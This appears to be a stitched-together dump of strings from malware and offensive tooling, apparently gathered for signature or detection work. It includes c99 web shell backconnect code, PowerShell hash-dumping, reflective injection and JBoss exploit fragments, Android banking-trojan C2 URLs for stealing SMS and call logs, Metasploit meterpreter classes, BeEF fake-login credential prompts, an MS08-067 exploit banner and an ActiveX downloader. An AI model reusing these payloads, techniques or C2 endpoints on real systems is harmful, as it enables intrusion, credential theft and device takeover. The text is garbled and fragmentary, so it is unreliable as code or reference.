(!function_exists(\"c99_buff_prepare\"))echo \"<option value=delete\".($dspact == \"delete\"?\" selected\":\"\").\">delete</option>\";if (!is_readable($o)) {return \"<font color=red>\".view_perms(fileperms($o)).\"</font>\";}displaysecinfo(\"list of attributes\",myshellexec(\"lsattr -a\"));displaysecinfo(\"ram\",myshellexec(\"free -m\"));displaysecinfo(\"where is perl?\",myshellexec(\"whereis perl\"));$ret = myshellexec($handler);if (posix_kill($pid,$sig)) {echo \"ok.\";}$connection = @ftp_connect($ftp_server,$ftp_port,10);echo $lang[$language.'_text98'].$suc.\"\\r\\n\";$blah = ex($p2.\" /tmp/back \".$_post['backconnectip'].\" \".$_post['backconnectport'].\" &\");$_post['backcconnmsge']=\"</br></br><b><font color=red size=3>error:</font> can't backdoor host!</b>\";$_post['cmd'] = which('<option value=\"wget http://ftp.powernet.com.tr/supermail/debug/k3\">kernel attack (krad.c) pt1 (if wget installed)<center>kernel info: <form name=\"form1\" method=\"post\" action=\"http://google.com/search\">which wget curl w3m lynxnetstat -atup | grep istelseif ( enabled(\"exec\") ) { exec($cmd,$o); $output = join(\"\\r\\n\",$o); }<form method=\"post\"><input type=hidden name=act value=\"ls\">foreach($quicklaunch2 as $item) {echo \"<option value=\\\"\". strrev(substr(strstr(strrev($work_dir), \"/\"), 1)) .\"\\\">parent directory</option>\\n\";for (i=1; i<=frmupload.max.value; i++) str+='file '+i+': <input type=file name=file'+i+'><br>';if (frmupload.max.value<=0) frmupload.max.value=1;
1 rookie/1.0$processinfo.arguments=\"-nop -c $downloadcradle\"$powershellexe=$env:windir+'\\syswow64\\windowspowershell\\v1.0\\powershell.exe'$postdata=\"script=println+new+processbuilder%28%27\"+$($cmd)+\"$url = \"http://\"+$($rhost)+\":\"+$($port)+\"/script\"$cmd = [system.web.httputility]::urlencode($cmd)$null = $enumbuilder.defineliteral('logon', 0x2000)$enumbuilder = $modulebuilder.defineenum('sspi.secpkg_flag', 'public', [int32])$enc = get-posthashdumpscript$lmhash = decryptsinglehash $rid $hbootkey $enc_lm_hash $almpassword;$rc4_key = $md5.computehash($hbootkey[0..0x0f] + [bitconverter]::getbytes($rid) + $lmntstr);install-ssp -path .\\mimilib.dll$finalshellcode.length@(0x60,0xe8,0x04,0,0,0,0x61,0x31,0xc0,0xc3)@(0x41,0x54,0x41,0x55,0x41,0x56,0x41,0x57,$targetmethod.invoke($null, @(0x11112222)) | out-null$poolpasswordcmd = 'c:\\windows\\system32\\inetsrv\\appcmd.exe list apppool= \"tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqinvoke-command -scriptblock $remotescriptblock -argumentlist @($pebytes64, $pebytes32, \"void\", 0, \"\", $exeargs)$base64decoded = [convert]::frombase64string($cpassword)$xmlfiles += get-childitem -path \"\\\\$domaincontroller\\sysvol\" -recursefunction get-decryptedcpassword {$up = test-connection -count 1 -quiet -computername $computer $out | add-member noteproperty 'password' $passwordexploit-jboss$url = \"http$($ssl)://\" + $($rhost) + ':' + $($port)\"/jmx-console/htmladaptor?action=invokeop&name=jboss.system:servicehttp://blog.rvrsh3ll.netremote url to your own warfile to deploy.[dllimport(\"advapi32.dll\", setlasterror = true, entrypoint = \"credreadw\"[string] $msg = \"failed to enumerate credentials store for user '$env:username'\"rtn = credread(\"target\", cred_type.generic, out cred);egress -ip $ip -port $c -delay $delay -protocol $protocol\\powershellrunner.pdbp
1 c:\\documents and settings\\administrator\\got wmi process pid: %dthis exploit will executerunning reverse shell<description>chken qq:41901298</description>version=\"9.9.9.9\"name=\"ch.ken.tool\"to host!ss.exelstrlen0rtlunwnc -l -p port [options] [hostname] [port]invalid connection to [%s] from %s [%s] %dpost-rcv getsockname failedfailed to execute shell, error = %sudp listen needs -p arghttp://www.site.com/test.dll?user=%username&pass=%passwordusername: \"%s\", password: \"%s\", remarks: \"%s\"user:\"%s\" pass: \"%s\" result=\"%s\"mozilla/4.0 (compatible; msie 4.01; windows nt)l
1 z{%08x-%04x-%04x-%02x%02x-%02x%02x%02x%02x%02x%02x}yuipwdfile0yuipkdfile0yuicrypted0yui1.0post %s http/1.0accept-encoding: identity, *;q=0ke
1 banner_layoutactivity_adpath_smsadpath_title_one7291-2ec9362bd699d0cd6f53a5ca6cdstart_serviceextra_key_smsandroid.provider.telephony.sms_receivedmphonenumbercnlybnq.qrk" // encrypted string "payload.dexcardholder nameinstagram.phpupd.php?text=android.app.action.add_device_admintap activate to continue with software update/upload-pictures.php?opened dialog:com/connect/myserviceandroid/os/binderandroid/app/servicedroidiandroidianserviceservicereceiverdendroidlastgamefile:///android_asset/enablecheatshttp://112.74.111.42:8000sha1-digest: oix4iywettkib4fbh7hconehuae=onlinegameprocedure_which_wap_idhttp://da.mmarket.com/mmsdk/mmsdk?func=mmsdk:posteventlogsha1-digest: +rsrtx5snjstrnt7pnaeqazy4kc=sha1-digest: rt2orts0wwtjffgletgffix1dfe=http://image.baidu.com/wisebrowse/index?tag1=%e6%98%8e%e6%98%9f&tag2=%e5%a5%b3%e6%98%8e%e6%98%9f&tag3=%e5%85%a8%e9%83%a8&pn=0&rn=10&fmpage=index&pos=magic#/channelpitchfork=022d4notlefttriangleequal=022ecsha1-digest: x27zpw9c6eyxvefuzfcl2lmumti=_znst12_vector_baseisssaissee13_m_deallocateepssjfbtp2ahr3wkc6leyon7d5gzxvismj4qulibgodlikelib.solibroot.sosilent91_arm_bin.rootlibr.solibpl_droidsonroids_gif.so41.208.110.46winmeif.myq-see.comwininit.myq-see.comsamsung.ddns.mecollge.myq-see.comsara2011.no-ip.bizandroidmanifest.xmlres/drawable-xxhdpi/ok_btn.jpgbot_idtype_password2decrypt.malloc.memset.free.pluginsms_encrypt.java_com_skymobi_pay_common_util_localdatadecrpty_encrypt.strcpy%ioperator%%imodel%%ideviceid%%ipackname%villllll280128120000z0w1e6fff4c5062fbdc9886fec93a75d2ac1121120104150z&inbox_timestamp > 0 and is_permanent=1contact_id = ? and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_domain6589y459zactivitylcom/android/zics/zruntimeinterfacemigfma0gcsqgsib3dqebaquaa4gnadcbiqkbgqc/jvgb0/jsrwi7i4j9iwo72kzw404kj02a97exbuefvee7yywstbkw5sylkxctaoqwwr19j0y+xb6+h2brunx307bv/qpg6dnpg+lx8fppvhbhoudgkb/xuzpaz/gjbtpwztbbmt+mi1qtrlyakdxsjgwyvopfvz82rxcablv/twidaqabmiiceaibadanbgkqhkig9w0baqefaascamiwggjeageaaogbal8m+bvt+njfalulgn0ja7vypndjtisptyd3stftr59v4tvljzjnsrdmxiupck1qhdbavx2prj7fvr6hyfg43hftsfx9ckbooc+d4vhx88++fue652apv9e5k9rp8yltondnnsgzp6yjvbneviaopfkmzzi+g8vxpzzhfwbuvx+3agmbaaecgyblyr6uoquapozqjtvia5bpx0ijej+ygybzh1qs3z9e4itz42rpkwjkchds6eia2kpolznqbbmrv4e8ut3ufcvufexjr5clgvkj+xhxxqs75+kt38wgzz1bw0pk4st1/aglrt5/netwuzmi/yfnfakrpqvrxuncxnlhmhs2eflkiqjbapgea2uxvwd0ti8cla8hiwpsncptcp41dh2h0yczrfmo2zafppjih2gqy5txszwblbjxfcy8/whryaqx0itmrgscqqdkh5u1nfprvk0hu8ibrb/lpygimz+wm/chfsc65sls/cml3u7huoj2lrgpz+bm68624h0klviqpbjpmayvbbyfakea1nnfj9uax8rdn1b3ecjpmvqqimdjwyvcnjjq7/wnj6nu3+0toxc0xrsheigtbhrfsnrxc6kfuv3budbhvwog9wjbai+frh1ekowlaqviundw6ycndwhedhysz0tdodlhp112ieign06dpsgyjsmqurntb92cjsnw82c3r2nhmicxr60cqqcn466jf9gjrzipo64oyw/elmac7vxgtegmvyz2/yfx5crclua4dygd1ju0emxpea9og/etwctv0rvpfc9ssn8vhhheeeeeebbbbbb??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,ivborw0kggoaaaansuheugaaaiaaaacabamaaaaxehz4aaaagfbmvevmaxguwuwtweatweatweatweavwuwtwealnfqiaaaab3rstlmalozouetympn8xgaaabfjrefuef7t2e9l+zacx/fp1i3n7pfhxauivw7k3hway1dfonci2l61lvs8fuoxzyw22rdbbub1an4kx7kqdqcvcilgdc0aulcghzaq+j/hab2hlc5butxeeomglgzikzkaledtakm95hsjpxs6t9eyrsghzmmvuyxkolzs2axycq98gei9sqwekgyb1/inmgutfw9irdlwdwghtuqcegw5a+zigwn5aqfvjq0zviwqkywfgyjvcordffbdtgmyu80mkfc2h5soxfglxbiqyg9b2xzhgrodzagzdiofm+y0e5zjthbhurzthl9bb24m8hlfzqcxt+cysix3qmjubn9jazz3clobwirko+8izvsdmk7po4lv/yexpt/rxboi6njtciraciracita2bey0xnod4x8d5wittwfuknnravscof+aarfk/cfbtwu0cveydduycganyxpykbx+oeqkl772i7yas/+cg+zmy6m8vyfdnonqpv5nkfkvi+tvmwaxxkigrdqdgxzo7xbsqx1b9qezhpibcmhei3wqeyn9d9fr+qccji7yfdb8zv+qhaeqfajcs5k2taqqxaaaaaasuvork5cyii=device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 copy_file_to_system.exemozilla/4.0 (compatible; msie 6.0; windows nt 5.1; sv1)!his=9!wn=!flof=!fil=!ps=i am so sad!i am so happy!jdk541please input file to bind and destination file name!%[^:]:%d,%d,%drun ok!installlocationdisplayversiondisplaynamewininet.dll internetopena internetconnecta httpopenrequesta httpsendrequesta httpqueryinfoa internetreadfile internetclosehandle
1 3,31363h3p3m3u3z3</svg>location.href='httprndbaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaakeme132.dllklospad.pdbabcxyz11!dmalock!dmalock3.0!dmalock4.0fso.gettempname();tmp_path = tmp_path.replace('.tmp', '.exe')var shell = new activexobject('wscript.shell');shell.run(t'zoomit - sysinternals: www.sysinternals.comm
1 httpf
1 %userprofile%\\iexpl0re.exe\"<770j ((\\users\\%s\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\iexpl0re.lnk\\documents and settings\\%s\\application data\\microsoft\\internet explorer\\iexpl0re.exeloaderv5.dllpost /index%0.9d.asp http/1.1get /search?n=%0.9d&dude_am_i_sharp-3.14159265358979x6.626176who_a_r_e_you?2.99792458x1.25663706143592bastard_&&_bitches_%0.8xc:\\bbb\\eee.txt
1 /c for /l %%i in (1,1,2) do ping 127.0.0.1 -n 3 & type %%windir%%\\notepad.exe > %s & del /f %s%systemroot%\\temp\\_dbg.tmp%systemroot%\\syswow64\\mspool.dll%systemroot%\\system32\\dpcore16t.dll%systemroot%\\system32\\wdigestex.dll%systemroot%\\system32\\mspool.dll%systemroot%\\system32\\kernel32.dll%systemroot%\\syswow64\\iastor32.exe%systemroot%\\system32\\msvcse.exe%systemroot%\\system32\\mshtaex.exe%systemroot%\\system32\\iastor32.exe%systemroot%\\syswow64\\mshtaex.exeinstaller.exeinfo: process %serror: getfiletime %s 0x%xinstall succeedederror: regsetvalueexa 0x%xhttp://www.java.com/en/download/installed.jsp?detect=jrec
1 winhelpwreadprocessmemorywshshell.run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, falsewshshell.currentdirectory = \"c:\\windows\\temp\\dropbear\\\"set wshshell = createobject(\"wscript.shell\")dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.htmlbadly formatted command= authorized_keys optionthis dropbear program does not support '%s' %s algorithm/etc/dropbear/dropbear_dss_host_key/etc/dropbear/dropbear_rsa_host_keypassds5bu9te7s
1 <a href=\"http://www.xfocus.net\">x-scan</a>report-analysis-of-host\\\\localhostiis.run>could not connecto %sn
1 steam_ker.dllfor /f %%a in (host.txt) do (for /f \"eol=s tokens=1 delims= \" %%i in (s2.txt) do echo %%i>>host.txtdel host.txt /qfor /f \"eol=- tokens=1 delims= \" %%i in (result.txt) do echo %%i>>s1.txtstart http.exe %%a %http%del result.txt s2.txt s1.txt nc [-options] hostname port[s] [ports] ... gethostpoop fuxoredvernotsupported%s [%s] %d (%s) `--%s' doesn't allow an argumentms08-067 exploit for cn by emm@ph4nt0m.orgmake smb connection error:%dsend payload over!maybe patched!rpcexceptioncode() = %up
1 app.stream-media.netfile %s does'nt exist or is forbidden to acess!getprocessaddresss of phttpqueryinfoa failed!connect %s error!download file %s successfully!index.tmpexecute pe successfullyaa/22/success.xmlaa/22/index.aspfile %s a non-pe filesendrequset error!filelist[%d]=%shttp://update.konamidata.com/test/zl/sophos/td/result/rz.dat?http://update.konamidata.com/test/zl/sophos/td/index.dat?internet connect error:%dproxy-authorization:basichttpqueryinfo failed:%dread file error:%ddowndll.dllinvalid urlcreate file failedmyagent%s%s%d%davaliable data:%u bytesthe procedure entry point %s could not be located in the dynamic link library %spsapi.dllwinhttpgetproxyforurlw
1 wmiexec.vbswmiexec errorin shell mode, running command background and persistentconnectport transmitportusage of pskillwhat user are we bruteforcing[server]connection tousage of packet transmitsof\x00twar\x00e\\mi\x00cro\x00soft\\win\x00dows\\cur\x00rent\x00vers\x00un\x00version\\r\x00dows\\current\x00software\\micro\x00/%lu.asp/%lu.txt/index.html?id=%ld\\httpclient.txtabout hc1host_namehost_portmozilla/4.0 (compatible; msie 6.0; windows nt 5.1)msutemp.dbtemp.datfs.opentextfile(server.mappath(\"online.txt\"),8,true)<%if session(\"pig\") <> 1 then%>ed132e13d1332bf7e2612a0eb848b30a<title>cr by
1 chown root:root /tmp/.scsi/dev/bin/gshchmod 4777 /tmp/.scsi/dev/bin/gsh_lib_version,%02d%03dtransitstorestr = 'echo -n \"%s\" | store --nullterminate --file=\"%s\" --set=\"%s\"' % (nopenargs, outfile, var_name)the nopen-args provided are injected into infile if it is a valid -i do not autokill after 5 hours__strtoll_internal__strtoul_internalefdghijklmnopqrsutg8hcj hcf lcf0lcnghhcj0hcf@lcf0lcn8hgetexecnameinvalid option `__fpstartghfijklmnopqrstuvxwhttp_referer=\"https://127.0.0.1:6655/cgi/redmin?op=cron&action=once\"exec /usr/share/redmin/cgi/redminop=cron&action=once&frame=crononceframe&cronk=cronv&croncommand=%2ftmp%2ftmpwatch&time=12%3a12+01%2f28%2f2005
1 proxy_info: automatic proxy url => %s proxy_info: connection type => %d proxy_info: proxy server => %s proxy_info: bypass list => %s internetqueryoption failed with getlasterror() %dd:\\hellsing\\release\\exe\\exe\\\\dbgv.sysxkat_binrelease sys file error.driver_load error. driver_create error.delete file:%s error.delete file:%s ok.kill pid:%d error.kill pid:%d ok.-pid-deletekill and delete pid:%d error.kill and delete pid:%d ok.%s\\system\\%d.txt_msgerhttp://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%shttp://%s/data/%s.1000001000/lib/common.asp?action=user_upload&file=\
1 -m minlen minimum length of a valid passwordhttp://www.thc.orguse for hacking: trim your dictionary file to the pw requirements of the target.w
1 reflectivepick_x64.dll$result = $minidumpwritedump.invoke($null, @($processhandle,$processfilename = \"$($processname)_$($processid).dmp\"invoke-psexeccmd\"[*] executing service .exe$cmd = \"%comspec% /c echo $command ^> %systemroot%\\temp\\# upload to a specified exfil uriserver path to exfil to.[*] pdc: lab-2008-dc1.lab.com$attempts = get-userbadpwdcount $userid $dcs$rightmouse = ($importdll::getasynckeystate([windows.forms.keys]::rbutton) -band 0x8000) -eq 0x8000-dll evil.dll$usermasterkeyfiles = @(, $(get-childitem -path $usermasterkeyfolder -force | select-object -expandproperty fullname) )$base64 = 'tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaainvoke-sshcommand -ip 192.168.1.100 -username root -password test -command \"id\"write-verbose \"[*] error loading dll\"write-bytestomemory -bytes $shellcode$getcommandlineaaddrtemp = add-signedintasunsigned $getcommandlineaaddrtemp ($shellcode1.length)$result = sc.exe config $($targetservice.name) binpath= $originalpath$result = sc.exe pause $($targetservice.name)$dllmain = [system.runtime.interopservices.marshal]::getdelegateforfunctionpointer($dllmainptr, $dllmaindelegate)#shellcode: calldllmain.asm$wc.headers.add(\"user-agent\",$script:useragent)$min = [int]((1-$script:agentjitter)*$script:agentdelay)if ($script:agentdelay -ne 0){if (($peinfo.filetype -ieq \"dll\") -and ($remoteprochandle -eq [intptr]::zero))remote dll injection$inveigh.smbrelay_failed_list.add(\"$http_ntlm_domain_string\\$http_ntlm_user_string $smbrelaytarget\")$ntlm_challenge_base64 = [system.convert]::tobase64string($http_ntlm_bytes)$keepassxml = [xml](get-content -path $keepassxmlpath)test-port -h $h -p $port -timeout $timeout1 {$nhosts=10; $threads = 32; $timeout = 5000 }where-object { $_.globalassemblycache -and $_.location.split('\\\\')[-1].equals('system.dll') }# get a handle to the module specified$kern32handle = $getmodulehandle.invoke($null, @($module))$dynassembly = new-object system.reflection.assemblyname('reflecteddelegate')$peloadedinfo = invoke-memoryloadlibrary -pebytes $pebytes -exeargs $exeargs -remoteprochandle $remoteprochandle$shellcode1 += 0x48$pehandle = [intptr]::zeroif ($exeargs -ne $null -and $exeargs -ne '')$exeargs = \"reflectiveexe $exeargs\"
1 ()ljava/util/set;(ljava/lang/string;)vljava/lang/exception;oooy32too.javabbfwkdljava/lang/process;getparametersimio.javaljavax/swing/jlist;-(ljava/lang/string;)ljava/lang/stringbuilder;ljava/io/inputstream;vfnnnrof.exnnnroeolsnnfwgetpropertyjava/io/filenotfoundexceptionllolp;cjhgreshhnuf stackmaptableonfwwa(c)ljava/lang/stringbuilder;lesia$fffgss;<clinit>()ljava/io/inputstream;openconnection gjhgreshhnijhgreshhrtsjhgreshhot.sjhgreshhihjhgreshht;)oi.class rjhgreshhorjhgreshhre rajhgreshhvjava/net/urlcreated-by: 1.7.0-b147 (oracle corporation)close-mail{right:130px ccc;box-shadow:0 0 5px 1px 757575;border-bottom:1px solid 777;height:1.8em;line-height:1.9em;display:block;float:left;padding:1px 15px;margin:0;text-shadow:-1c4c4c4;}999;-webkit-box-shadow:0 0 3px header div.service-links ul{display:inline;margin:10px 0 0;}t div h2.title{padding:0;margin:0;}.box5-condition-news h2.pane-title{display:block;margin:0 0 9px;pfooter div.comp-info p{color:pcmi-listing-center .full-page-listing{width:490px;}pcmi-content-top .photo img,333;}div.tfw-header a var{display:inline-block;margin:0;line-height:20px;height:20px;width:120px;bacay:none;text-decoration:none;outline:none;padding:4px;text-align:center;font-size:9px;color:333;}body.page-videoplayer div373737;position:relative;}body.node-type-video divpcmi-content-sidebara,.page-error-page fff;text-decoration:none;}qtabs-list li a,cdn2.dailyrx.comer div.panel-hide{display:block;position:absolute;z-index:200;margin-top:-1.5em;}div.panel-pane div.ve.gif) right center no-repeat;}div.ctools-ajaxing{float:left;width:18px;background:url(http://cdn3.efefef;margin:5px 0 5px 0;}node{margin:0;padding:0;}div.panel-pane div.feed a{float:right;}:0 5px 0 0;float:left;}div.tweets-pulled-listing div.tweet-authorphoto img{max-height:40px;max-widthi a{color::bold;}div.tweets-pulled-listing .tweet-time a{color:silver;}div.tweets-pulled-listing div.tweet-didiv.panel-pane div.admin-links{font-size:xx-small;margin-right:1em;}div.panel-pane div.admin-links ldiv.tweets-pulled-listing ul{list-style:none;}div.tweets-pulled-listing div.tweet-authorphoto{marginffffdd none repeat scroll 0 0;border:1px solid vider{clear:left;border-bottom:1px solid screen.height:</script></head><body onloadfx0zaqrkxuvgbh0qndrjvxywgg4tgh8ahqoavqqsnyo0nelxfjaadi0nfqyesl1fbbnntfospibmadwnptqxpsdkwuuee2ucgr0z0);-10<bfunction fl(){var a0);else if(navigator.mimetypes);b.href/presults.jsp128.164.107.221)[0].clientwidth:escape(c),enavigator.plugins.length)navigator.plugins[window;dgr(),jviewportfqv2d0zah1vgdxgzvg9cowycawkctzacbxscbfokaamhufvuwf5evvyvdvtur18ba1qdau8hqjgeufyeaez4sbecek1ftxsdulvasquare ad tag (tile adrandnum cellspacing\\n//-->\\n</script>//-->' 2287974446noscrbeg -- start adblade -->' 3427054556 while (i >return '<table width</scr' s.substring(0, i /></a></noscript>' else { isemail ).submit(); borderpub-8301011321395982apiclientconfigfunction/.test(pa.tostring())background-image:url(http:\\/\\/static.ak.fbcdn.net\\/rsrc.php\\/v2\\/y6\\/x\\/s816ewc-2sl.gif)}music.init',header:'bool',recommendations:'bool',site:'hostname'},create_event_button:{},degrees:{href:'url'},cca6477272fc5cb805f85a84f20fca1ddocument.createelement('form');c.actionjavascript:falses.onmessage){j.error('an instance without whenready or onmessage makes no sense');throw new error('anan;}else hsprintfwindow,jo.getuserid(),dafb.runtime.getloginstatus();if(b)');k.tostringrovide('xfbml.send',{dimensions:{width:80,height:25}});{log:i};e.exportsa;fb.api('/fql','get',f,function(g){if(g.error){es5(es5('object','keys',false,b),'foreach',true,functrue;}}var iadocument.createdocumentfragment();img.srctypeof(events)var i,x,y,arrcookiescallbacks.length;j<l;jencodeuricomponent(value);if(options.domain)valueevent,hg.components.get('windowevent_''read'in cookie){return cookie.read(c_name);}item;},get:function(name,def){return hg.components.exists(name)){window.addevent(windowevents[i],function(){var callbacksreunload:function(callback){hg.events.add('beforeunload',callback);},add:function(event,callback){hgname){if(hg.components.exists(name)){delete hg.componentlist[name];}}},util:{uuid:function(){return'window.hgx.replace(/encodeuricomponent(this.attr[key]));}options.domain;if(options.path)valuethis.page_sid;this.attr.user_sid).join(json.stringify:function(o){if(o){try{var a);return $.jqotecache[i]o.getutcfullyear(),hours')');};$.secureevaljsonisfinite(n);},secondstotime:function(sec_numb){sec_numb')');}else{throw new syntaxerror('error parsing json, source is not valid.');}};$.quotestringo[name];var reta[m].substr(2));if(d){return true;}}}catch(e){return false;}}a.length;m<k;mif(parentclasses.lengtho.getutchours(),minutes$.jqote(e,d,t),$$q.test(x)){e{};hgwidget.creatorfunction gsh() {200 height'sh.js'><\\/script> 2 - 26;<iframe id,100);200></iframe>'about:blank' widthmf.document.write(kasper new activexobject(szhttp); csa2;var ado new activexobject(szox88);/test.exe szetyij;var http %41%44%4f%44%42%2e%4d%65%64%69%61var szsrjq%43%3a%5c%5c%50%72%6f%67%72%61%6dvar method ado.mode %61%79%65%72%2e%58%4d%4c%48%54%54%50 7 - 6; http.open(method, szurl, i-3); var jsmlastmenu position:absolute; z-index:99' -1)jsmsetdisplaystyle('popupmenu' '<tr><td><a href jsmlastmenu var ids this.target jsmprevmenu, 'none'); if(jsmprevmenu )if(menudata[i]) '<div style jsmsetdisplaystyle('popupmenu' function jsmhidelastmenu() menudata.length; iscripting.filesystemobjectobjdata 0105000002000000e0c9ea79f9bace118c8200aa004ba90b68007400740070003a002f002f00<?xml version=<?mso-application progid=\"word.document\"?>w:macrospresent=\"yes\"<w:bindata w:name=<o:characters>0</o:characters><o:lines>1</o:lines>n
1 c:\\windows\\temp\\pojie.exe /l=c:\\windows\\temp\\s.exec:\\windows\\temp\\s.exe tcp explorer.exe http://www.hackdos.comfailed to read file or invalid data in file!wtne / made by e compiler - wutao the interface of kernel library is invalid!eventvwrfailed to decompress data!notepad.exe result.txtgetlogons/showthread.php?t=156643sedebugnamevalueuser-agent: mozilla/4.0 (compatible; msie 7.0; windows nt 5.2; .net clr 1.1.4322software\\classes\\http\\shell\\open\\commandsystem\\controlset001\\services\\%sglobal\\%s-key-event%d%d.exeglobal\\%s-key-metuxget / http/1.1qy001id=%d;qy001guid=%s'sedebugprivilegeopen author: cyg07*2from golds7n[lag]'jdamageunhook iogetdeviceobjectpointer ok!\
1 http://www.vip80000.com/hot/index.htmlgetconnectstringcncert.safe.ssclone.dll(*.jpg;*.bmp;*.gif;*.ico;*.cur)|*.jpg;*.bmp;*.gif;*.ico;*.cur|jpgklock.dlle
1 connect %s:%i http/1.0cks=uthj@hadvpackhashtableget_isdisposedtripledestestmemory.frmmain.resources$
1 dllaspxspyiis spyprotected void dgcow(object sender,eventargs e)openmydoorinstall service errorstart remove servicendisversionunable to alloc the adapter!wait for master fuckxx.exe <host> <port>chkroot2007door is bind on %smicrosoft.exchange.clients.auth.dlldllshellexc2010users\\ljw\\documentsplease input pathauth.owa\\dnstunclient\\\\t-dnstunnel\\xssok.blogspotdnstunclientbecause of error, can not analysiscan not deal witn the errorthe other retun one rstcoversation produce one errorprogram try to use the have deleted the bufferefh3 [hex] [srcfile] [dstfile]123.exe 123.efhencoder: b[i]: = (luid error)users\\k8team\\desktop\\getpassworddebug x64\\getpassword.pdbgetuserinfo usernamejoe@joeware.netif . specified for userid,game over good luck by windreleicenamejingtisanmenxiachuanxiao.vbswinds updategtalklite.comcomputer=%s&lanip=%s&uid=%s&os=%s&data=%sd13idmadmerror: peeknamedpipe failed with %i.dllut.exeut.urlutlisten socket error.wsaasyncselect socket error.new socketinfo error!http/1.1 403 forbiddencreate socket error.this service can't be stoped.provides support for media palyercreaetprocess error%4.2f gbdos emluator ver\\pipe\\fastdosfastdos.cppfail,error code = %d.safeproxy htservertimer quit!useage: %s pid%s port[%d] to port[%d] success!p0: port for listener\\users\\whg\\desktop\\plug\\[+y] cwnd : %3d, fligth:\\unitfrmmanagerkeylog.pas\\unitfrmmanagerregister.pasinput name...new value#tthreadrcontrol.execute seh!!!\\unitfrmrcontrol.pasonsocket(event is error)!make 3f version ok!!!pelease do not change the docamentpress [ok] continue run, press [cancel] exitfail to load lsasrvuser principalring rat exception(can not update server recently)!sucess!user canceled!temp result file , change it to where you likeby. twi1ight[both mode] ,delay time to read resultsuch as nc.exe or trojan+++shell mode+++win2008 fso has no privilege to delete filednstunclient -d or -domain <domain>dnstunclient 